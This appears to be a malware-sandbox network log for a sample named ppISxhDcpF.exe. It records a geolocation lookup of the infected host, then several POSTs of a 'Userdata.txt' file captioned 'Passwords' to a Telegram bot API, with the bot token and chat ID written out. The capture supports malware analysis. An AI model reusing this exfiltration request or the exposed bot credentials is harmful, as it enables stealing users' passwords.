                                                                                                              2025-01-10 19:10:07 UTC1390INData Raw: d3 fe 6a c2 c3 5b e6 57 c9 eb 16 ec 82 18 58 24 db cb 65 4a cc 64 65 3c 3d 07 ca 13 59 ef bb 19 1b ac a8 82 d3 0c 8d e0 08 b4 75 77 a4 4a a5 10 8b f3 64 17 09 ae 8a 1c 59 aa 6d d2 4e 33 c4 60 ee 6c a5 aa d9 31 ba f0 77 8d 49 9d 2c 7b 95 59 3a 2e a8 b6 e9 b3 34 cb 6b 98 77 a8 26 bd a8 c5 c4 e0 79 9f 6a 79 67 a3 cd 03 dc f8 8d 94 e3 31 d3 1b 98 cd 68 bd 40 10 21 91 24 fa 2a cd 99 2f 2c 10 77 98 76 cd 4d 6c 39 a2 60 db cc 99 7b 1c e3 49 12 ad 2a 1f f0 0b 03 6a 33 8c c3 a0 7c 39 36 da 37 d3 2e 63 5f 7e b0 14 12 ed c3 d9 3d d5 c1 35 a8 26 bc 63 fc 33 b8 7f 3a a8 44 27 18 ae 6a a2 3c 99 61 25 14 2e 7e 36 7f 78 66 7f 14 c1 d0 f3 9e 9f 63 aa 53 e5 a3 6d a3 4a 2a 3e a4 d6 54 da 0a 9e 3b bb 6d cb d1 a7 ed 56 b1 31 1a a5 01 9a 95 10 ee 65 ce 8d c0 18 42 20 28 74 73
                                                                                                              Data Ascii: j[WX$eJde<=YuwJdYmN3`l1wI,{Y:.4kw&yjyg1h@!$*/,wvMl9`{I*j3|967.c_~=5&c3:D'j<a%.~6xfcSmJ*>T;mV1eB (ts
                                                                                                              2025-01-10 19:10:07 UTC1390INData Raw: 08 a0 7b 31 20 45 54 4e 86 b1 72 51 fa de ec 34 c9 38 fc 44 41 81 b7 a4 7a 72 4e cd 62 c5 c2 e6 68 f6 07 70 56 41 13 d8 6f c8 94 33 b0 b6 24 53 77 fe 2b aa 66 fd 1c ac 98 c5 34 8e 47 67 ad 19 a8 40 79 af 98 a5 01 45 86 d8 90 9d 70 56 f3 84 b6 9f 0a 5c ba 05 8f 0e cd a5 c7 cb 68 c6 21 4a 07 f2 19 90 d2 5c fb 18 af 94 c2 ea ed d3 03 f0 7e 3a 7f 5d 56 16 b2 f9 e8 36 c0 44 a5 ca 2d 1a a0 60 d5 a1 52 47 85 18 d1 90 cf b6 c7 63 a3 2f fd 47 b8 1e e2 62 e6 92 f1 2c e6 ae 12 c8 fc 9e 05 e1 b4 66 a0 7f 6a f8 0e 84 96 90 46 2a 24 c9 31 e6 4e a8 5d f7 45 11 e0 53 c3 f3 01 19 fa 34 a4 ee b3 bc c3 45 a8 ec 1b df a9 d1 e6 41 da b1 68 1f 1b 8e 4a 3f ed 90 ce 02 ed 9e af 0c 87 ea 44 ac f2 7c 90 82 db 17 ab 36 d6 88 68 e7 1b 86 7f 37 03 09 26 3c 92 6f dd 86 8b 45 05 b2 91
                                                                                                              Data Ascii: {1 ETNrQ48DAzrNbhpVAo3$Sw+f4Gg@yEpV\h!J\~:]V6D-`RGc/Gb,fjF*$1N]ES4EAhJ?D|6h7&<oE
                                                                                                              2025-01-10 19:10:07 UTC1390INData Raw: 50 69 74 ad e5 ac 63 df 45 ea 98 cd 3e 19 70 bd da 45 53 e8 d8 8c 19 e5 63 92 2c dc dd 45 eb 29 a5 1e 73 0b 24 e0 24 10 7c a2 b4 cd 4e b3 a3 8e 56 52 79 b2 fb 1d da 8a 26 37 a0 de 3a 6b 0d 63 86 ba c8 0e db 52 b3 3e 20 9d fc 66 23 30 8e 82 16 7f e6 36 e5 5b 28 e7 db 30 ba 7a c0 75 e4 e3 46 45 a5 f3 35 80 bf 38 e4 d1 8a d8 82 d5 a1 4c 87 12 b5 dc 2a d9 5a f0 0c 58 e7 c8 4e f9 c4 48 87 8f 1b 86 43 35 d6 53 d9 93 ad de 6c 31 d1 53 7c 7c d6 04 a7 b1 c5 b8 00 12 3d ef fc d3 1d 5a 85 46 c6 a4 86 5f 27 d8 65 5c 54 1f f1 17 66 5f 88 5c da 22 40 3a 00 4b 01 53 3a f8 4c 61 10 8a 9a 93 19 2a 55 43 f1 ec 6f 2c 97 d8 2f 42 02 37 03 57 b6 70 c8 bf b2 6d cd 91 01 57 1b c5 8d 83 68 29 8e dc bb 63 bb 88 d7 a5 ed d4 db 44 c8 70 73 b2 e2 ac a6 a8 f3 2d 31 55 df 1e 7c 2e c1
                                                                                                              Data Ascii: PitcE>pESc,E)s$$|NVRy&7:kcR> f#06[(0zuFE58L*ZXNHC5Sl1S||=ZF_'e\Tf_\"@:KS:La*UCo,/B7WpmWh)cDps-1U|.
                                                                                                              2025-01-10 19:10:07 UTC1390INData Raw: 74 dd dd 9d 1f fe f0 c1 c1 c4 3c 29 3b 78 d1 d5 6d a1 f3 09 7c 1b e7 82 90 bf 65 9f cb 14 51 ca 17 d0 75 2b 09 0e d4 96 46 26 a0 5e 31 c9 eb dd e8 34 18 dc ed 00 f3 a8 80 fd 74 fc 49 98 18 8b d6 78 13 f2 c7 73 e5 97 cd 99 86 dd c1 e5 ee cb e7 6f c3 b4 9b ea 11 2e 57 1f 2a 3e 22 9e 3d ff 1d 05 77 72 70 42 1e 8d 2a c2 ec 2b 16 9b 5e 0e 92 74 52 fd d6 35 b1 d0 da 69 38 8b 60 b3 19 d1 b7 cd ac 8e d6 86 de c5 95 ac 10 21 83 29 3f 04 e6 ab 2c fb b6 b0 a9 b5 e4 7e c0 81 28 ca 4b 83 e4 f0 f9 bc 16 f0 2f 2a 4c 82 32 66 df 9a ee a9 1f b6 35 d9 fe 00 44 ad f4 f7 80 c0 35 67 4a 84 ea c0 37 71 07 b8 18 db 47 f8 eb 14 7b e0 29 85 30 a3 e2 54 a1 d8 c9 34 fa 2d cf eb 4b f9 64 75 b8 62 5f b6 93 01 76 42 5c 77 f0 74 db 46 22 87 5f 6d 78 34 be c4 c8 b2 c9 cc 5f 84 53 fa 80
                                                                                                              Data Ascii: t<);xm|eQu+F&^14tIxso.W*>"=wrpB*+^tR5i8`!)?,~(K/*L2f5D5gJ7qG{)0T4-Kdub_vB\wtF"_mx4_S
                                                                                                              2025-01-10 19:10:07 UTC1390INData Raw: 44 f0 8e 76 a2 4f c8 56 20 3f 47 e7 80 07 32 e1 9e f5 94 f4 1c d0 66 ed 0d e4 e6 42 78 06 c1 e4 8f 1d 55 f5 d1 c7 51 db 46 7b ff 81 c2 9b f6 16 2f 82 f3 4b b7 14 3f 27 fa 7d c2 9a c7 c3 41 b3 e8 58 ea a8 12 52 3f ed e5 9d 58 cd 6e 6e 0a 04 41 da 13 5b 9b 00 d5 1b dc 86 c0 db 7e dd f7 1e 49 43 a5 a4 4b af 31 ab 64 b7 17 03 be 63 c7 47 a5 68 c4 58 0e ff 68 fa 7f a9 bb e6 9e d2 ec 77 fd 54 aa 37 7b e3 4a 41 c6 af c4 9d a8 1c 41 04 4d 7d 80 db ae ac c7 c6 e1 1a 05 19 85 17 cc 12 10 d4 d5 dd 80 fa 5b 85 88 98 c7 46 94 48 01 23 ae 6e ed 0b ba 05 2f 26 7e 60 93 67 cd 4d 94 38 a2 60 e0 53 88 70 09 fc 51 0f 88 27 f0 fb 77 f7 7b 39 90 2a ce 90 32 27 db 74 c5 07 c9 55 56 d0 05 17 88 90 d9 3d df c1 34 ef 33 bc 63 f0 33 b0 6e 37 85 df d9 0f 97 c8 d7 2d 93 69 35 3f 51
                                                                                                              Data Ascii: DvOV ?G2fBxUQF{/K?'}AXR?XnnA[~ICK1dcGhXhwT7{JAAM}[FH#n/&~`gM8`SpQ'w{9*2'tUV=43c3n7-i5?Q


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849747104.21.96.14434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:17 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 19:10:17 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 19:10:17 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1851006
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ss7ehuJpqTElw3QyeCzBbUZZL8uQXxhYTP7TpOl9gh48c2i4atxDwsNqEu%2B6d3JgZFDJz5TdEfD3smsJ9FhIVB%2B%2B4K9X7xQeLhojTnEwsKHX6dGNpp25DxdMSbhGtC5h8a1xEtax"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ffef760dd9ac32e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1567&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1809169&cwnd=178&unsent_bytes=0&cid=ad4ee7f807c5db75&ts=164&x=0"
                                                                                                              2025-01-10 19:10:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849775149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:25 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd318086900029
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 19:10:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 30 38 36 39 30 30 30 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd318086900029Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:25 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:25 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:25 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43525,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536225,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849789149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:27 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd319c6abdf465
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 19:10:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 63 36 61 62 64 66 34 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd319c6abdf465Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:27 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:27 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:27 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43526,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536227,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849801149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:29 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31b1443a20fa
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 31 34 34 33 61 32 30 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31b1443a20faContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:29 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:29 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:29 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43527,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536229,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849815149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:31 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31c60e986e76
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 36 30 65 39 38 36 65 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31c60e986e76Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:31 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:31 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 544
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:31 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43528,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536231,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849830149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:32 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31dac9051ac1
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 61 63 39 30 35 31 61 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31dac9051ac1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:33 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:33 GMT
